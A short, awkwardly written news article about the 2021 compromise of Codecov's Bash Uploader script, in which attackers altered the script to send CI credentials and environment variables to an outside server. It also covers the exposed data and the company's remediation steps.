Famous Codecov Coverage Tool get Hacked and Hijacks Dev Credentials!

Codecov an organization that hosts the code and testing reports and statistics online. On Thursday the attackers have manipulated the Bash Uploader Script and get the confidential user information from a continuous integration environment.

However, the organization identified this attack on 1st April but the investigation shows that this attack was related to a supply chain attack that was happened in January.

What Happened in January?

The organization named Codecov assists the developers by examining how the source code is executed in the testing, the entire process is named as code coverage. Which generally indicates that the bugs and unwanted errors that present in the execution code.

The organization is dealing with more than 29,000 enterprises and also included some big names that are Atlassian, Washington Post, Royal Bank of Canada, Procter & Gamble, and GoDaddy.

Whereas, Bash Uploader is the tool that codecov clients used to transmit the code using the coverage platform. It deals with the CI-specific setting and holds reports and uploads the relevant information.

The hackers are aimed to steal the data collection devices that were started on January 31st. Attackers manipulate the scripts and transfer the details from the customer environment to the server that is established outside Codecov’s infrastructure which is shown online 525.

Famous Codecov Coverage Tool get Hacked and Hijacks Dev Credentials!

Hence, the weakness that permits the attacks to gain access was a bug or error present in the process that creates the Codecov’s Docker image which permits them to extract the credentials those are protect the modification in Bash Uploader Script.

Although the listed information about the Bast Uploader Collected, the organization said that the attacks may use malicious version while exporting the sensitive data listed below;

  • Any tokens, key, or credentials that customer have to pass from the CI runner that would be accessible when the Bast Uploader script is executed
  • Any datastore, services, and application code that may give accessed using the credentials, keys, or by using the tokens.
  • Git Remote information the URL of the original repository and the repositories that used the Bash Uploaders while uploading the coverage to Codecov in CI

All the potential risks that affect the users are strongly recommended to re-roll the credentials and keys or tokens that were present in the environment variable occupies as CI processes and relays on Bash Uploader.

Clients are using the local version of the script to check if the attacker added the line 525 that exists in the code. In case the line is present they have to replace the bash file with the latest Codecovs version of the script.

What Preventions did the Organization Take?

Famous Codecov Coverage Tool get Hacked and Hijacks Dev Credentials!

Meanwhile, in the original version, the script uploaded the data from the ENV variable into the Codecov’s platform and after the hackers modified it the Bast Uploader is sending the detail to the address that was mentioned by the attackers.

Therefore, the organization has to take some serious steps to revoke the effects of this attack are listed below;

  • Auditing where the key is accessible
  • Rotating all the relevant and needed internal credentials include the key that used to update the modification in the Bash Uploader
  • Executing with hosting provider while examining the third-party server to ensure that the webserver was exactly decommissioned
  • Fixing up the auditing and monitoring tools while revoking all types of unwanted access that may change the Bash Uploader again.

The organization also said that the attack also affects the security policies, practices, controls, and procedures that were had to set up. We are continuously monitoring the network and our system for all unwanted activities.

Leave a Reply